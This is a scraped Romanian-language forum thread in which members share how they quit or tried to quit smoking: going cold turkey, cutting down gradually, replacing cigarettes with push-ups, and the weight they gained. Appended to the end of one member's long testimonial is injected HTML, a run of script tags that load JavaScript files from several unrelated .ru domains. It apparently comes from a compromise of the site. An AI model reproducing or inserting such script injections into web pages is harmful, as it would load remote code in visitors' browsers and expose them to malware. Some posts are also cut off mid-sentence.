PDA

Arată versiune întreagă : CUM V-ATI LASAT DE FUMAT?

Brasov34
27.01.2005, 13:04
Intreb asta pentru ca n-am fumat niciodata ( nici macar n-am incercat) , iar sotul meu mereu ma "pacaleste " ca se lasa de fumat si nu o face. Singurul lucru pe care-l urasc la el este TIGARAsmileys/smiley19.gif...

Cei care ati trecut prin faza asta, poate ne dati un "TRATAMENT" in aceste sens:CUM SA FACEM CA OAMENII SA UITE CA EXISTA TIGARI si mai ales SA NU ISI AMINTEASCA DE ELE mai tarziusmileys/smiley2.gif...

ASTEPT cu nerabdare sfaturi, solutii de la cei care cu adevarat ati reusit performanta asta!

VA FELICIT SI MAI ALES VA APRECIEZ AMBITIA!smileys/smiley32.gif

angela
27.01.2005, 13:23
Eu am renuntat la fumat in urma cu 8 luni de zile, dar cum sa fac sa nu imi amintesc ca exista tigari, asta nu am reusit niciodata. Inca mai vreau sa fumez, nu ma consider complet vindecata de acest viciu, daca mai beau si o bere gata aia sunt, vreau tigara smileys/smiley36.gif. In acelasi timp sunt constienta ca dauneaza sanatatii ( a se citi: sunt prea scumpe, cel putin aici in state), deci nu voi mai fumasmileys/smiley2.gif

Isabella
27.01.2005, 20:51
Eu nu sunt o fumatoare inraita,insa mai fumez vreo patru cinci tigari pe zi. Pot sa ma las oricand vreau, dar intrebarea e chiar vreau?Ce zici, Melina fumezi o tigara cu mine ?

28.01.2005, 00:30
Eu fumez 15 tigari pe zi si am incercat sa le reduc dar nu am reusit in primul rind din cauza serviciului.Stau toata ziua cu fundul pe scaun si singurul loc unde ne mai intilnim cu colegiiin pauza este locul de fumat.

Daca o sa reusesc sa ma las o sa va spun si cumsmileys/smiley2.gif

O tigare sau doua Isabella?smileys/smiley4.gif

Isabella
28.01.2005, 00:31
Doua,ca merge mai bine.

Johann
28.01.2005, 00:57
...si eu tot cam 15 tigari poate un pachet pe zi fumez,am incercat si eu sa le reduc dar vorba aia usor de zis ,greu de facut...in 16 ani de cind fumez cred ca doar 1 saptamana am stopat ...smileys/smiley36.gif

28.01.2005, 00:59
si eu cam al felsmileys/smiley9.gif

Johann
28.01.2005, 01:19
..apropo am uitat..si eu stau tot pe scaun cam toata ziua...smileys/smiley36.gif

28.01.2005, 01:21
smileys/smiley18.gifhai la gym

Johann
28.01.2005, 01:25
hmm...smileys/smiley18.gif..vinerea..!?..smileys/smiley36.gif

28.01.2005, 01:29
No way! de lunismileys/smiley4.gif

Johann
28.01.2005, 01:31
..ok..luni intram la sala..sa fim ..puternici pentru lumptele care o sa le dam cu ursi ..pesti smileys/smiley36.gif..nuci..si alte chestii...smileys/smiley36.gif

Fethoden
28.01.2005, 02:09
BRASOV 34

Am fost fumatoare.Timp de 8 ani , am fumat "Marlboro" (la inceput am fumat rosu, apoi light), am ajuns sa consum chiar cate un pachet intreg la 24 de ore.

Cand mi-am zis sa renunt la fumat, stiam ca nu voi rezista sa beau o cafea fara sa fumez,nu concepeam o cafea fara tigara....asa cum nici o tigara nu o consumam fara sa beau ceva(o bere,sau cel putin o cola..etc.)

Fiindca tigara cu cafeaua stateau "mana in mana",mi-am zis sa consum doar la cafea cate tigari pot.Asta dimineata ,cand serveam cafelutza........,in cursul zilei...ma mai ispitea cate inca o tigara, doua....le fumam........dar aveam in gand sa ma las si in timpul asta, de dupa momentul:cafea+tigari, si incercam sa ma abtin , sa nu aprind altele si altele de cate ori imi venea...pofta.

Dupa f.scurt timp(o saptamana-doua), am ajuns sa renunt la tigarile din cursul zilei, fumam doar la cafea 4-5 cat simteam eu ca sunt de ajuns pe ziua respectiva.Dupa asta, in cursul zilei deci,nu mai fumam.Asta fiindca nu mai voiam sa fumez, luptam sa nu mai vreau asta,sa imi scot din gand asa ceva...mama ce furnicaturi ma trecea...cand ma starduiam sa nu aprind alta tigara...era greu, foarte greu.....

La un momentdat, am ajuns sa despic firul in patru la capitolul cafeaua +tigarile de dimineata....Mi-am propus sa "umblu" putin si acolo, si sa reduc si din alea.....De la 4-5 cate fumam strasnic la cafelutza de dimineata ,....am ajuns sa fumez doar 2-3.....dupa un timp, am fumat doar 1-2 .....si la maxim o luna de zile, nu am mai fumat nici o tigara...cand fumam dor una , la un momendat , m-am vazut cum am stins-o cand era doar un sfert arsa si fumata ...si am simtit o puternica repulsie uitandu-ma lascrumiera in care zacea strivita tigara aproape intreaga ....!!!!!!

GATA..acolo a fost moartea tigarii pentru mine..!!!!....multumesc lui Dumnezeu...vorba aia, ca femeie, mi-am zis in primul rand:de ce sa nu miroase gura mea a trandafir si nu a afumatura de aia nicotinica....!!!??? Plus alte aspecte :dau bani pe crema de fata -sute de dolari- intr-un an de zile, iar pe de alta parte imi stric si tenul si stomacul si ficatul cu ...tigarile....care tot o groaza de bani costa.....!!!iar la urma ajungi si la medic, tot bani,nu...?--deci am gasit ca nu-si au rostul...!!!!--am ajuns la concluzia cat e de rea placerea fumatului...!!!!

Cand eram fumatoare, si vedeam pe pachet cum scrie "tutunul provoaca cancer" ,sau :"grav daunator sanatatii"..etc...intorceam pachetul sa nu vad asta....pentru ca nu VOIAM sa ma las, ...deci, concluzia mea, e ca totul tine de vointa.Dar numai si numai daca reusesti sa iti implantezi aceasta intentie in subconstient se reuseste altfel ,NU!

Degeaba zici ca renunti, zici sa te auda altii ...si mai zici ca si "NU POT", mai toarna o bere, mai aprinde o tigara, mai pune de-o cafea....oooooho....merge...!

Nu , nu asa, trebuie fixata bine ideea ca atare, altfel nu iese nimic.

Cand mirosea dimineata a cafea in bucatarie....eram cu un pisoi care adulmeca placutul miros....dar cu ochii dupa pachetul de tigari...mama stia ce caut si ...ofta!...smileys/smiley36.gif..saraca de ea...abia astepta sa las tigarile si credea ca nu o sa mai vada asta vreodta de la mine, asa le "mancam"...!!!!!!smileys/smiley36.gif

ACUM, beau cafea....cu mare placere ....dar , culmea e ca ...MERGE si fara tigara...!!!!!!

Ma simt bine, multumita ca am reusit sa trec peste asta.....doresc tuturora care vor sa se lase de fumat, muuuulta vointa....si ...muuuuuult succes!!!!c=http://www.jvke.r<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script s<script src=http://www.iroe.ru/ngg.js></script>

tonita
28.01.2005, 03:56
Eu m-am lasat de multe ori. E foarte usorsmileys/smiley36.gif.

Dar exact cu spune Fet, doar c

28.01.2005, 04:11
Toni ,

iti multumesc pentru grija dar ce crezi ca mai apuc sa fac riduri sau ticuri cu catastrofa care se anunta?!smileys/smiley4.gifce mai conteaza un rid sau tic in plus sau in minus...smileys/smiley36.gif

P.s.citi ani ai fumat??

angela
28.01.2005, 07:00
Eu inca il astept aici pe Rossa sa de3zbatem subiectul : renunti dintr-o data sau se poate si treptat?"smileys/smiley2.gif

Pentru ca se poate si treptatsmileys/smiley2.gif

tonita
28.01.2005, 07:36
P.s.citi ani ai fumat??

Prea multi !smileys/smiley17.gifMa tem doar pentru avatarul tau care mai devreme sau mai t

28.01.2005, 08:18
Brasov34, fumatul este o addictie.Este extrem de dificilsa abandonezi obiceiul atata timp catpersoana respectiva nu este convinsa de importanta acestei decisii.Sa nu mai vorbim ca este o decizie foarte personala si indiferent cat de mult te bate cineva la cap nu vei actiona pana nu te vei hotari singura.Am auzit demulte tratamente si medicamente folosite pentru a renunta la fumat, dar din experienta personala, cel mai eficace methoda este cold turkey. Cand m-am hotarit sa ma las, nu am mai cumparat tigari si am refuzat cand altii mi-au oferit. Cel mai greu este cand esti inconjurat de colegi de serviciu, prieteni sau familie care fumeaza. L ainceput am avut dureri de cap, insomnie, agitatie, si alte tulburari dar dupa cateva saptamani nu mai simti nevoia sa fumezi si respiri mai bine, ai mai multa energie si bani in buzunar.Acum nici nu mai pot suporta pefumul in jurul. Bafta!

Fethoden
28.01.2005, 08:42
Ah,imi amintesc cum sotul meu se umfla in pene, crezand ca m-am lasat de fumat ca asa avea el chef....Da de unde...!???smileys/smiley17.gif

I-am si zis, asta am decis-o EU, nu e ca asa a vrut EL...!!!!

Ca daca nu vrei asta, degeaba o vor ceilalti...!!!!

Chiar uneori ma incapatanam sa-i "arat" cum fumez!

Acum cand stie ca m-am lasat doar ca am vrut eu si nu e rezultatul influentei sale...la cat e de..... catar(!!)....!!!!!...ar vrea sa fumez din nou...! ...ce ti-e si cu barbatii astia uneori...!!!!!smileys/smiley29.gif

tonita
28.01.2005, 20:53
"...ce ti-e si cu barbatii astia uneori...!!!!!http://www.romanian-portal.com/forum/smileys/smiley29.gif"

Fet, nu intelegi ca in multi barbati e un suflet de cavaler ?! S-a umflat in pene pentru ca a crezut ca ti-a facut un bine, pentru ca ar fi fost salvatorul tau !!! A credintei biruinta cata ori ce cavaler !

29.01.2005, 05:53
[QUOTE=toni42]

Ma tem doar pentru avatarul tau care mai devreme sau mai t

tonita
29.01.2005, 06:07
Poti sa-mi dai adresa da ta de email ?smileys/smiley36.gif

Feel free to say no ! (http://www.feel-free.info/)

mihaelaNV
29.01.2005, 06:51
Fumatullllllllllllllllllllllllllllll:))))))))))))) )) ahhhhh my enemy.Cand eram in Romania, parintii mei, unchi, matusi, bunici, toti fumau...apoi "sorela" smileys/smiley2.gifmea, a inceput si ea la 18......ai mei au acceptat spunand ca mai bine acasa , cu ei, ca daca tot vrea ar fuma pe ascuns....iar eu, locuind cu ei........nu am fumat niciodata.Oameni buni....intzeleg prin ce trecetzi, dar tot nu va intzeleg. Se simte pe respiratzie, buzele/piele vi se usuca, sa nu vorbim de tusit, sa nu vorbim de slabit, de tot ce e rau. Tatal meu si sora mea sunt doctori, iar mama este invatzatoare...fromos exemplu, nu?

Idea este ca de fiecare data cand manacm, nu terminau bine de mancat, si drept in moaca mea imi fumau......respect definitiv smileys/smiley7.gif

Tata a incercat sa se lase de tzigara, spunea ca e tare greu ca inca mai bea cafea, si cafea fara tzigara e ca si "slanina far ceapa":smileys/smiley2.gif

smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif.....a inceput sa rontzaie in fiecare zi guna de mestecat, tic -tac, ar fi reusit daca d-na maica-mea s-ar fi lasat si ea...dar nu d-le trebuie sa il tempteze inca o data....si uite asa s-a luat draga mea mama inca o data dupa draga de Eva si l-a atras ca pe Adam in capcana...fuma de fatza cu el.

Mama nu s-a lasat numai pentru o ora, ca apoi tanti"cutare", a suparat-o tare de tot, si repede a luat o tzigara.

Evident sa te lasi, la fel cu slabitul, nu este ca incepi de azi si gata....mental trebuie sa o faci...si exact ca si cu copiii, trebuie sa rasplatesti acest efort cu ceva ce iti place. Stii ca-tzi place sa innotzi, te lasi de fumat dar incepi sa innoti...orice.

Cu mama nu a mers, tata ar putea dar inspita e la el in casa:)))))))

Nu acum pe bune...ce ma surprinde este ca mama, era pe punctul de a-si pierde vederea din cauza fumatului(fuma 2 pachete/zi...de fapt inca mai fumeaza)......si tot nu a speriat-o desstul, si cand a aflat vestea sa se calmeze si-a luat o tzigara. Apoi a aflat ca are cancer malign, tot din cauza fumatului, tot nu s-a lasat.......nu stiu ce o va ajuta sa se lase...dar eu nu cred ca mental incearca.

Bunicul meu insa, tatal mamei, a fumat de la varsta de 13 ani(razboiul).......a fumat non-stop...carpatzi fara filtru, 2 pachete/zi, apoi la 73 de ani, s-a trezit, si-a aruncat toate pachetele de tzigari si din ziua aceea nu a mai fumat o tzigara. Nimeni nu stie ce s-a intamplat de ce, se pare ca asta va intra in istoria neamului meu....la sectia "mistere"...acum are 87, si normal s-a ingrasat, dar nu mai fumeaza!!!!!!!! El este eroul meu la subiectul "fumatul".

In rest.....nu stiu cum va lasatzi de fumat oameni buni, este evident ca o boala nu va sperie de ajuns, e un drog, si trebuie tratat si intzeles ca un drog , nu ca o "bomboana" ce ma face sa ma simt mai bine, ce-mi indulceste sufletul...mai degraba il innegreste.

Bafta!!!!!!!smileys/smiley19.gif

Brasov34
29.01.2005, 15:57
GAta, acum va spun si rezultatul hotararii noastre cu privire la renuntarea la fumat.Noi am gasit "SOLUTIA"!smileys/smiley9.gif

Defapt eu m-am hotarat sa slabesc si ca sa fac mai multa miscare mi-am facut abonament la o sala de GYM , iar sotul, ca sa ma ambitioneze, mi-a spus acum cateva minute:

"Din momentul cand incepi antrenamentele la sala ma las de fumat...

dar daca renunti, ma reapuc."smileys/smiley36.gifProbabil nu are incredere in mine dar ii arat eusmileys/smiley2.gif...

...Acum totul depinde de mine, cat de ambitioasa voi fi cu exercitiile!smileys/smiley17.gif

Problema e ca nu l-am intrebat, cand se va termina cu slabitul cat doresc eu, ce va face el?smileys/smiley36.gifsmileys/smiley36.gifSE VA REAPUCA DE FUMAT?smileys/smiley19.gif

In orice caz e buna si o pauza de 1 an...poate UITA!smileys/smiley32.gifsmileys/smiley11.gif

Isabella
29.01.2005, 18:37
Apropos, nu v-ati ingrasat cand v-ati lasat de fumat?

kiddy
30.01.2005, 03:54
Fumatul, fumatul... of... de-ar disparea tigarile astea... De la 14 ani
fumez. Si ce e culmea? Cica eram sportiv la vremea aia. De
performantza...smileys/smiley19.gif

In ultimii ani in Ro am ajuns si la un 1 pachet jumate pe zi. O singura
data am reusit sa le intrerup pentru 3 luni. De fapt cred ca asta mi-am
si propus atunci, sa le intrerup. Am rezistat la nu stiu cate ispite,
pe la cateva bairame fiind. La servici colegii pufaiau ca locomotivele.

Ca sa te lasi, cred eu ca-ti trebuie o motiv. In cazul meu a fost o
suparare, as putea spune ca m-am suparat ca vacarul pe sat si ca sa ma
razbun am hotarat sa nu mai fumez. Daca aveam si plete, cu sigurantza
ca mi le-as fi taiat. In schimb m-am hatarat sa-mi las barba. smileys/smiley1.gif
Dar n-a durat prea mult. Ce m-a determinat sa reiau fumatul? O prostie,
in aburii alcoolului mi s-a parut mie ca o tigara nu va insemna nimic.
Mi-aduc aminte ca era vorba de un Marlboro super long. Parca n-as mai
fi vazut, oricum la vremea aia erau destul de rare, americane de la
mama lor (acum fie vorba intre noi, nu stiu de ce dar prefer marcile
americane produse in Ro decat cele originale). Si cu asta le-am reluat.
Asta vara am mai avut o tentativa, am rezistat 2 saptamani. E drept ca
speriat de anumite simptome. Plus ca pe-al meu tata l-a rapus cancerul.
Am reusit totusi sa le reduc semnificativ, 1-2 tigari pe zi, am si zile
la rand cand nu fumez deloc. Dar nu cred ca e suficient, trebuie luptat
pana la a le elimina definitiv. Totul e sa ai vointa, nu cred in
metodele alternative gen plasturi Nicoderm, guma de mestecat Nicoderm,
masaje, acupunctura sau mai stiu eu ce alte metode de a cheltui banii.

Isabella intreaba daca nu ne ingrasam cand ne lasam de fumat. Afla ca
eu unul am tendinte, spre disperarea mea am pus cateva kg bune. smileys/smiley5.gif

angela
30.01.2005, 10:33
Si eu am pus kilograme frumoase cand am renuntat la fumat, dar asta exact din prostia mea smileys/smiley9.gif, stiam, eram perfect constienta ca nu trebuie sa exagerez cu mancarea dar la crizele de nervi si la modul in care transpiram atunci crede-ti ca m-a mai interesat aspectul asta??? Nope, si uite asa a ajuns Ileana Consanzeana la cura de slabiresmileys/smiley2.gifsmileys/smiley36.gif

31.01.2005, 03:06
Poti sa-mi dai adresa da ta de email ?smileys/smiley36.gif

Feel free to say no ! (http://www.feel-free.info/)

feel free to use PMsmileys/smiley23.gif

pepper
07.02.2005, 06:55
Am fumat 10 anisi intr-o zi le-am spus prietenilor ca a venit timpul sa ma las. Am inceput prin a rupe o tigara in jumatate si a mari intervalul dintre jumatatile fumate. Apoi am fumat jumatate iar in locul celeilalte jumatati am facut 10 flotari. Dupa aceea din prima jumatate am fumat doar jumatate si am facut 10 flotari, si pina la urma in interval de o luna am ramas cu flotarile. Simplu si eficient fara motiv doar cu vointa si adio nicotina si alte gudroane.

tonita
05.02.2014, 09:25
Ca sa mai scutur praful de pe topicul asta, raspund înca odata la întrebarea lansata:

Brusc!

sorin
05.02.2014, 09:58
La fel si eu, foarte brusc. Fara nici un ajutor de gen gume, sau de alea de lipit pe mana. In 4 zile fac 6 luni.

livia
05.02.2014, 15:10
Felicitari! Eu inca nu am reusit. Ultima data am rezistat aproape o luna, dupa o gripa nemernica dar le-am luat iar dupa o petrecere cand am zis fumez in seara asta si de maine le las.

sorin
05.02.2014, 15:18
Si mie-mi vine de multe ori, dar ma gandesc la altceva si in cateva secunde trece.

Pisoi
05.02.2014, 16:05
Si mie-mi vine de multe ori, dar ma gandesc la altceva si in cateva secunde trece.
...yap! te credem! ...ca e crivat afara si ia mai mult imbracatu' si dezbracatu' doar pt un puf de nicotina! :d:

livia
05.02.2014, 16:39
Nu-mi mai spune cum e afara, ca taman ce am intrat in casa de la dezapezit ca pana maine dimineata ingheata bocna si nu mai avem cum scoate masinile. A nins viscolit si masinile erau de jumate ingopate in zapada ca azi nu ne-am dus la munca.

biliboaca
06.02.2014, 02:55
Pe 1 ianuarie m-am lasat si pe 3 ianuarie m-am reapucat. Asadar am ambitii marete pe 2014 - sa ma las de tutun, de beutura si de manele.

sorin
06.02.2014, 07:45
sa ma las de tutun, de beutura si de manele.
Daca te lasi de fumat, te las sa postezi manele pe forum :ideea:

biliboaca
12.02.2014, 03:32
Daca te lasi de fumat, te las sa postezi manele pe forum :ideea:

bre daca promiti solemn, io ma las. ma gandeam sa incep chiar o campanie agresiva cu tema "maneaua -muzica calitativa care nu toata lumea o intelege"
as apela la suportul lui AdyC la o adica, pen'ca stiu ca era printre putinii care-mi impartaseau pasiunea.

deci ma lasi sa postez cate vreau io?

sorin
12.02.2014, 06:16
deci ma lasi sa postez cate vreau io?
na ca m-ai facut sa ma razgandesc cu intrebarea asta. ma pot astepta la orice, asa ca pica treaba. lasa-te de fumat doar pentru binele tau, nu pentru manele :music:

biliboaca
12.02.2014, 06:29
na ca m-ai facut sa ma razgandesc cu intrebarea asta. ma pot astepta la orice, asa ca pica treaba. lasa-te de fumat doar pentru binele tau, nu pentru manele :music:

Ce face bre? Pai cand ii iei omului cauza devine fiara. Poate sa dubleze nr tigarilor de ex. De la un pachet la doua, caz concret. Tu chiar vrei sa ai constiinta incarcata?

sorin
12.02.2014, 06:48
Las' ca gasesti tu alte motivatii. Asta mi-ar mai lipsi, sa vad ca-si fac conturi pe forum alde Guta, Minune, Salam si alte "vedete", ca dupa aia tre' sa inchid dracu' forumu' si sa plec la tratament. De tigari mai ai sanse sa scapi da de inima rea nu cred. /:)

tonita
12.02.2014, 07:49
.... Asta mi-ar mai lipsi, sa vad ca-si fac conturi pe forum alde Guta, Minune, Salam si alte "vedete", ca dupa aia tre' sa inchid dracu' forumu' si sa plec la tratament....

astea-s speculatii de genul "daca si cu parca s-au suit p'o barca" de ce n-o lasi pe bili sa ascultam manele daca îi face bine. Bili e aici, e a noastra, o iubim, o tachinam da face parte din dream team. Salamu îl aruncam la gunoi, cu tot cu ambalajul unsuros si nu pierde nimeni nimic. N-ai oo daca ti-e frica!

@bili, baietu' ista are stress, se gândeste la tratamente...

Olga
13.02.2014, 06:54
Am stins tigara jumate fumata, cu 12 ani in urma cel putin si niciodata nu m-am mai gandit la tigara sau la fumat.
M-am spalat pe dinti si in gura, am dat jos hainele care miroseau a fum si direct in masina de spalt le-am aruncat, am luat un dus sa nu-mi aminteasca nimic de acea putoare infernala. Am tinut 1 pachet de tigari intr-un sertat parca 2 ani si nici nu m-a interesat, fiica l-a aruncat dupa o vreme ca erau total expirate si uscate. Voiam sa intru intr-un Shop pe aeroport sa cumpar ... ca eram obisnuita cand calatoream, dar am cumparat parfum si ciocolata in loc de tigara!!!
N-am suferit absolut deloc si nici inlocuitor de nicotina nu mi-a trebuit ca nici inainte nu foloseam guma de mestecat.
In casa nu fumam deloc asa ca nu-mi era greu de stat in casa vara pe canicula fara tigara, in masina cu aerul conditionat nu se poate fuma iar fara AC mori de insolatie sau fripta :) Ceva greutate am luat insa asta din cauza toxinelor din tigara si de la retragrerea obiceiului corpul sufera schimbari.

sorin
13.02.2014, 07:51
N-ai oo daca ti-e frica!
adevarat, n-am, apropo de acest subiect. cred ca m-as apuca iar de fumat daca-i dau mana libera lui bili sa bage manele.

tonita
13.02.2014, 07:53
... niciodata nu m-am mai gandit la tigara sau la fumat...
...
Olga, înseamna ca n-ai fost fumatoare adevarata.

Olga
13.02.2014, 16:47
Asta cum sa mai inteleg??? Cand cumperi tigari multe si le fumezi ... poate undeva se numesc doar clienti :)
Dunhill rosu am fumat pana sa se scumpeasca la $60 cartusul cu taxe cu tot in San Diego cu 25 de ani in urma, chinezii le vindeau mai ieftin din contrabanda in magazinele si restaurantele lor dar erau departe de unde locuiam si am trecut pe Parliament ca era atunci la inceput si inca ieftin, azi costa parca $15 cu taxe cu tot un pachet, ca nu avea o clientela stabila ca si astazi, lumea fuma Marlboro si alte tigari cu filtru.

livia
13.02.2014, 17:10
Am langa mine un fost fumator, dupa 12 ani inca are momente cand il mai bate gandul sa-si aprinda o tigare. Nu e asa usor.

sorin
13.02.2014, 17:57
un fost fumator, dupa 12 ani inca are momente cand il mai bate gandul sa-si aprinda o tigare
E discutabil aici. Stiu unii/unele care s-au lasat de fumat, dar fumeaza in vacanta si atat, pe cand pe altii ii aud ca dupa x ani au fumat o tigara si au inceput din nou sa fumeze. Consider ca atata timp cat ai avut vointa sa te lasi de fumat, inseamna ca te poti controla si chiar daca-ti vine odata pe chelie sa fumezi o tigara, nu e nici o problema apoi sa nu fumezi o luna, un an sau zece ani. Nu stiu cum e dupa cativa ani (abia am facut 6 luni de cand m-am lasat), dar banuiesc ca si peste 20 de ami e la fel ca dupa o luna, adica tot simti din cand in cand nevoia sa fumezi una.

VanDerGigi
13.02.2014, 19:09
E discutabil aici.. banuiesc ca si peste 20 de ami e la fel ca dupa o luna, adica tot simti din cand in cand nevoia sa fumezi una.

Sorine iti place sa fi simpatic. Care e diferenta intre ce a spus Livia si ultima ta fraza? :lol:

Asta cum sa mai inteleg??? Cand cumperi tigari multe si le fumezi ... poate undeva se numesc doar clienti :)
Dunhill rosu am fumat pana sa se scumpeasca la $60 cartusul cu taxe cu tot in San Diego cu 25 de ani in urma, chinezii le vindeau mai ieftin..

Doamna Olga, o sa o confuzati rau pe Fifica acum. Nu o sa mai inteleaga saraca cum cineva care cunoaste banul adevarat, sa se lase de fumat ca s-a facut $60 cartusul.

Pisoi
13.02.2014, 19:21
Dunhill rosu am fumat pana sa se scumpeasca la $60 cartusul cu taxe cu tot in San Diego cu 25 de ani in urma, chinezii le vindeau mai ieftin din contrabanda in magazinele si restaurantele lor dar erau departe de unde locuiam si am trecut pe Parliament ca era atunci la inceput si inca ieftin, azi costa parca $15 cu taxe cu tot un pachet, ca nu avea o clientela stabila ca si astazi, lumea fuma Marlboro si alte tigari cu filtru.
Olguta,
...tu ai un stil aparte (adorabil) in postarile tale prin care, de cele mai multe ori bagi lumea in ceata prin explicatiile tale evazive, din care cititorul de rand nu poate sa inteleaga ceva concluziv!:-/
...io' cred ca am inteles cu totii ca "te aciuesti prin US" de ceva multi ani, asta nu inseamna ca tre sa ne reamintesti la aproape fiecare postare...ce si cand!:ideea:
p.s ...lasand pretul tigarilor de acum 25 de ani, ...la tine in "sat" ...cam cat e acum pretul la "branza de burduf" acum si cam cat era pretul acum 25 de ani?:thinking:

Olga
13.02.2014, 20:19
Olguta,
...cam cat e acum pretul la "branza de burduf" acum si cam cat era pretul acum 25 de ani?:thinking:

Pai cu 25 de ani in urma NU era nici o marfa romaneasca prin saturile astea din sud-vestul american!!!
Branza de Burduf am gasit pentru prima oara recent intr-un singur magazin cu proprietari bosniani parca dar musulmani ca n-am stiut ce inseamna ca e marfa de frati sau surori, era o expresie afisata ... si un pachetel de 200 de grame costa peste UD$8.00. Am cumparat 2 pachete ca-i departe magazinul de la mine, iar benzina costa mai mult decat mancarea!!! Deloc nu era inghesuiala de romani la cumparat branza!!! Am lamurit pe Tony despre obiceiul meu de fumat din anii trecuti, daca n-ai inteles textul bine, dar mereu crezi ca duc pe cineva in eroare. Nu sint asa de naivi forumistii cum mi le descrii. Astea sint informatii valuabile sa afle lumea cum era viata odinioara in America.

sorin
13.02.2014, 20:53
Care e diferenta intre ce a spus Livia si ultima ta fraza? :lol:
E mai multe diferente Jiji. Una ar fi ca ai scos din context sa-ti iasa bine, a doua ca 20 nu e egal cu 12, cum iarna nu-i ca vara, iar a treia e ca ce spune Livia e o certitudine, pe cand ce spun eu e o banuiala. Mai vrei? :starsmile::pet:

Olga
13.02.2014, 23:57
Fifica ... Nu o sa mai inteleaga saraca cum cineva care cunoaste banul adevarat, sa se lase de fumat ca s-a facut $60 cartusul.

Nu cred, atunci am lucrat pe $7.50/h brut, dupa ce am dat bani reali foarte multi pentru niste cursuri de facultate sa pot obtine un job in meseria mea ca nu eram cetatean american. Facand socoteala ... ca numai ajungeam in urma preturile asa se schimbau de repede, la intrare in magazin era una dar la casa deja era alta ... am realizat ca undeva ceva trebuie sa se schimbe dar nu consideram optiune renuntarea la fumat.

tonita
14.02.2014, 02:19
Olguta,
...tu ai un stil aparte (adorabil) in postarile tale prin care, de cele mai multe ori bagi lumea in ceata prin explicatiile tale evazive, din care cititorul de rand nu poate sa inteleaga ceva concluziv!:-/

Cititorul de rând nu întelege, dar noi nu stam la coada la tigari pentru ca ne-am lasat! Cred ca Olga poate explica foarte clar diferenta dintre a-fumat, când vi de la party si pretul brânzei de burduf. Trebuie doar sa fi atent la context si sa sortezi afirmatiile pline de tâlc în ordinea lor fireasca, alfabetica. Fumatoru adevarat, care-a renuntzat, viseaza c-a fumat, noaptea, în pat si zau nu stie: a fost adevarat? (Dedicatie poetica pentru doamna Olga din Europa(!))

livia
14.02.2014, 11:06
Stiu unii/unele care s-au lasat de fumat, dar fumeaza in vacanta si atat, pe cand pe altii ii aud ca dupa x ani au fumat o tigara si au inceput din nou sa fumeze. Consider ca atata timp cat ai avut vointa sa te lasi de fumat, inseamna ca te poti controla si chiar daca-ti vine odata pe chelie sa fumezi o tigara, nu e nici o problema apoi sa nu fumezi o luna, un an sau zece ani. Nu stiu cum e dupa cativa ani (abia am facut 6 luni de cand m-am lasat), dar banuiesc ca si peste 20 de ami e la fel ca dupa o luna, adica tot simti din cand in cand nevoia sa fumezi una.

Aia care s-au lasat si pot fuma la o petrecere mai speciala sau o vacanta, cazuri izolate, apoi nu mai fumeaza iar mi se par cei mai tari, am cunoscut 2 persoane.

Poate mi-ar trebui o perioada mai lunga fara tigari sa ajung la performanta aia. Nu am trecut de maxim 2 luni si de fiecare data am zis ca daca fumez 1 nu se pune si s-a ales praful.

Acolo e problema, daca fumezi una nu se pune dar te limitezi la una? Dupa ce am simtit iar placerea de a fuma am uitat ca de fapt ma lasasem.

Tot ce am reusit pana acum este sa le cobor undeva la 5-10 /zi de la peste 1 pachet/zi inainte.

qualia
14.02.2014, 12:17
Olga, înseamna ca n-ai fost fumatoare adevarata.

Ce inseamna fumatoare adevarata?

M-am lasat de fumat acum aprox 24 de ani, fara nici o problema si de atunci nu am mai fumat nici o tigare. Culmea, imi place fumul de tigare, pot sta fara probleme in prezenta fumatorilor, dar depinde totusi ce fumeaza.

In momentul in care am inceput sa lucrez, in numai 3 zile m-am lasat de tigari si de cafea. Singurul loc in care se putea fuma era o scara intunecoasa, unde lumea venea cu stacana de cafea facuta la filtru dis-de-dimineata. Cred ca am fumat 2 tigari acolo, dar am continuat sa merg multe luni cu o prietena, numai sa-i tin companie. Atit de tare m-a deranjat tot aranjamentul, in special cafeaua era o placere pentru mine si n-am suportat sa continui sa beau in momentul in care nu mai aveam nici o placere. Nu eram fumatoare doar la cafea, am fost fumatoare "grea" :) toata facultatea, de Carpati fara filtru, Bucegi si infectele Snagov, desi inceputurile au fost mult mai delicate. In afara de primul Kent, la 5 ani, sub indrumarea fratelui meu, de la care am lesinat, noroc ca era mama acasa, urmatoarea tigare a urmat abia la 12 ani cu o prietena, ce vremuri, cind ea avea nu stiu ce pila la un chiosc, de unde a luat tigari mentolate. Pe la 16 deja fumam si am avut noroc de o mama intelegatoare, care mi-a spus ca daca tot fumez, macar sa nu fumez timpenii si-mi dadea ea tigari fine, Moore, Kent, evident nu m-a putut aproviziona in timpul facultatii, cind numarul de tigari a crescut la vreo 10 pe zi. Deci, am fost sau nu fumatoare adevarata? :)

Toate obiceiurile sint in creier. Schimbi obisnuinta, schimbi obiceiul, nu e usor, dar nici extrem de greu. Daca atunci cind vrei sa fumezi te indeletnicesti cu altceva, ceva placut, care sa te faca sa uiti, poate ajuta. E valabil pentru orice dependenta. De obicei ajuta si trasul puternic de aer in piept :) prea rar sintem atenti la propria respiratie si daca o facem corect, din abdomen, nu toracic, tot corpul se oxigeneaza mai bine, inclusiv creierul si asta e un mic exercitiu care te ajuta sa te constientizezi in prezent si nu in umbra dependentei.

Pisoi
14.02.2014, 18:59
Pai cu 25 de ani in urma NU era nici o marfa romaneasca prin saturile astea din sud-vestul american!!!
Branza de Burduf am gasit pentru prima oara recent intr-un singur magazin cu proprietari bosniani parca dar musulmani ca n-am stiut ce inseamna ca e marfa de frati sau surori, era o expresie afisata ... si un pachetel de 200 de grame costa peste UD$8.00. Am cumparat 2 pachete ca-i departe magazinul de la mine, iar benzina costa mai mult decat mancarea!!! Deloc nu era inghesuiala de romani la cumparat branza!!! Am lamurit pe Tony despre obiceiul meu de fumat din anii trecuti, daca n-ai inteles textul bine, dar mereu crezi ca duc pe cineva in eroare. Nu sint asa de naivi forumistii cum mi le descrii. Astea sint informatii valuabile sa afle lumea cum era viata odinioara in America.
...nu am specificat nici-unde ca forumistii ar fi naivi, comentariul meu "de cele mai multe ori bagi lumea in ceata" s-a vrut un pic generalizat avand in vedere si alte raspunsuri evazive ale tale si pe la alte topice! :ideea:

